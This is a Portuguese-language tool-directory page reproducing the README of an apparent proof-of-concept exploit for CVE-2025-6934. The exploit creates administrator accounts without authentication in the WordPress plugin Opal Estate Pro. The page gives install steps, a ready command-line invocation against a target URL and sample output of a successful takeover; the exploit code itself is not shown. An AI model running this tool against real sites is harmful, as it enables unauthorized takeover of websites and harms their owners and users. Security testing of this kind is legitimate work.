Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mejbankadir/cve-2025-6934-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmejbankadir/cve-2025-6934-poc

CVE-2025-6934-PoC

Ferramenta de Exploit CVE-2025-6934 para Criação Não Autenticada de Conta de Administrador no Plugin WordPress Opal Estate Pro

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔓 Ferramenta de Exploração CVE-2025-6934

Criação de Conta de Administrador Não Autenticada no Plugin Opal Estate Pro do WordPress


Python PyQt6 Status License

Criado e desenvolvido totalmente por mejbankadir (SMH tech e Mejban HackSheild Sob NexoAmicus)


📋 Descrição

CVE-2025-6934 é uma vulnerabilidade crítica no plugin Opal Estate Pro do WordPress (versões <= 1.7.5) que permite que atacantes não autenticados criem contas de administrador em sites WordPress vulneráveis.

Esta ferramenta oferece versões CLI (Interface de Linha de Comando) e GUI (Interface Gráfica do Usuário) para explorar esta vulnerabilidade.


⚠️ Detalhes da Vulnerabilidade

AtributoValor
ID do CVECVE-2025-6934
GravidadeCrítica (CVSS 3.1: 9.8)
Plugin AfetadoOpal Estate Pro
Versões Afetadas<= 1.7.5
Tipo de VulnerabilidadeCriação de Conta de Administrador Não Autenticada
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

🛠️ Instalação

Pré-requisitos

root@kitploit:~
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934

# Install dependencies
pip install -r requirements.txt

Requisitos

root@kitploit:~
requests
beautifulsoup4
colorama
PyQt6        # For GUI version only

🚀 Uso

Versão GUI (Recomendada)

root@kitploit:~
python3 CVE-2025-6934-GUI.py

Recursos da GUI:

  • Interface moderna com tema escuro
  • Progresso da exploração em tempo real
  • Saída de console colorida
  • Validação de entrada
  • Execução não bloqueante

Versão CLI

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123

Argumentos:

root@kitploit:~
-u, --url        Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)

📖 Exemplo

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  _____________   _______________                            │
│  \_   ___ \   \ /   /\_   _____/                           │
│  /    \  \/\   Y   /  |    __)_   ______                   │
│  \     \____\     /   |        \ /_____/                   │
│   \______  / \___/   /_______  /                           │
│           \/                  \/                           │
│                                                             │
│          CVE-2025-6934 Exploit PoC                         │
│                                                             │
│  Created and developed fully by mejbankadir                │
│  (SMH tech and Mejban HackSheild Under NexoAmicus)        │
└─────────────────────────────────────────────────────────────┘

Exemplo de CLI

root@kitploit:~
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123

[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
    Username : administrator
    Email    : [email protected]
    Password : MyP@ss123
    Role     : administrator

🎨 Recursos

Versão CLI

  • ✅ Banner com arte ASCII
  • ✅ Saída colorida (usando colorama)
  • ✅ Verificação de versão
  • ✅ Extração de nonce
  • ✅ Tratamento de resposta JSON

Versão GUI

  • ✅ Interface moderna com tema escuro
  • ✅ Saída de console em tempo real
  • ✅ Validação de entrada
  • ✅ Execução em thread em segundo plano
  • ✅ Barra de status
  • ✅ Design responsivo

🔒 Aviso de Segurança

⚠️ AVISO: Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

O acesso não autorizado a sistemas de computadores é ilegal e antiético.

Ao usar esta ferramenta, você concorda em:

  • Testar apenas sistemas que você possui ou para os quais tem permissão explícita
  • Não usar esta ferramenta para fins maliciosos
  • Assumir toda a responsabilidade por quaisquer consequências legais

📝 Créditos

FunçãoNome
Criador e Desenvolvedormejbankadir
OrganizaçãoSMH tech & Mejban HackSheild Sob NexoAmicus

📂 Estrutura do Projeto

root@kitploit:~
CVE-2025-6934/
├── CVE-2025-6934.py       # CLI version
├── CVE-2025-6934-GUI.py   # GUI version
├── CVE-2025-6934.yaml     # Documentation
├── requirements.txt       # Python dependencies
└── README.md             # This file

🐛 Solução de Problemas

Erros de Certificado SSL

A ferramenta desativa automaticamente os avisos de SSL. Se você encontrar problemas:

root@kitploit:~
requests.packages.urllib3.disable_warnings()

Falhas na Extração de Nonce

  • Certifique-se de que a URL do alvo está correta
  • Verifique se o plugin Opal Estate Pro está instalado
  • Verifique se o site está executando WordPress

📜 Licença

Licença MIT

Copyright (c) 2025 mejbankadir (SMH tech e Mejban HackSheild Sob NexoAmicus)


Feito com ❤️ por mejbankadir

SMH tech | Mejban HackSheild | Sob NexoAmicus

Baixar ferramenta